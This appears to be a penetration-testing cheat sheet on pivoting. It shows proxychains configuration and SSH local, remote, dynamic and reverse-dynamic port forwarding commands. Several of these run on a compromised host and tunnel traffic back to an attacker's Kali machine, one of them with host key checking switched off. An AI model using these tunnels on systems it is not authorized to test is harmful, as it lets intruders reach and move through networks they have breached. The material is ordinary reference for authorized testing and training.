Port forwarding
Proxychains-ng
Version of proxychains that allows to specify different configurations for each connection. Useful for running multiple proxies on different ports when pivoting through several subnets.
apt-get install proxychains4
proxychains -f <conf file> <command>SSH
Local port forwarding
Allow to reach an isolated machine connected to an exploited one by using the exploited machine to forward all packages between the Kali host and the target.
On Kali: redirect any traffic (0.0.0.0) to the target by logging in the compromised machine in the middle
ssh -N -L <origin ip>:<origin port>:<target ip>:<target port> <middle usr>@<middle ip>Remote port forwarding
Use this technique if the firewall is blocking incoming connections so it is not possible to establish an SSH session between the attacking machine and the target, but we can establish a connection from the targeted machine towards our host bypassing the firewall’s inbound traffic filters.
Can also be used to expose services running as localhost on the remote machine to the attacker, to the remote machine all connections being forwarded will appear as if they were coming from localhost.
On compromised machine: reroute all incoming traffic to attacking machine
ssh -N -R <kali ip>:<kali port>:<target address>:<target port> <kali user>@<kali ip>Example of exposing services running as localhost
Run the following command on the compromised machine to map the local service port to a new port exposed to the attacker's machine.
ssh -N -R <exposed port>:localhost:<service port> <kali user>@<kali ip>We can access the exposed service by navigating to the exposed port in our attacker machine. For instance if the exposed service is a web server and the specified exposed port is 8000 we can access the hosted content by navigating to http://localhost:8000 on the attacker machine
Dynamic port forwarding
Set a local listening port and have it tunnel incoming traffic to any remote destination through a proxy. Works the same way as a local port forwarding but allows to target different ports and machines without having to create different tunnels for each host or port.
On Kali: connect us (127.0.0.1) to any target in network through the machine in the middle
ssh -N -D 127.0.0.1:<port> <middle user>@<middle ip>Setup:
cat /etc/proxychains.conf
#new proxies go under [ProxyList]
socks4 127.0.0.1 <port>
#run commands through proxy
proxychains <command>Reverse dynamic port forwarding
Works the same way as the Remote port forwarding technique plus the ability to change destination on the target network.
On compromised machine: reroute all traffic from any port to the attacker
ssh -f -N -R <port> -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i <path to keys> <kali user>@<kali ip>Setup:
1. Create public keys on compromised machine
mkdir /tmp/keys
ssh-keygen
cat <path to key>.pub2. Copy the keys in your kali machine
echo from="<domain ip>",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa ssh-rsa <key.pub content> >> ~/.ssh/authorized_keys3. configure proxychains
cat /etc/proxychains.conf
socks4 <proxy ip> <port>
#run commands through proxy
proxychains <command>Last updated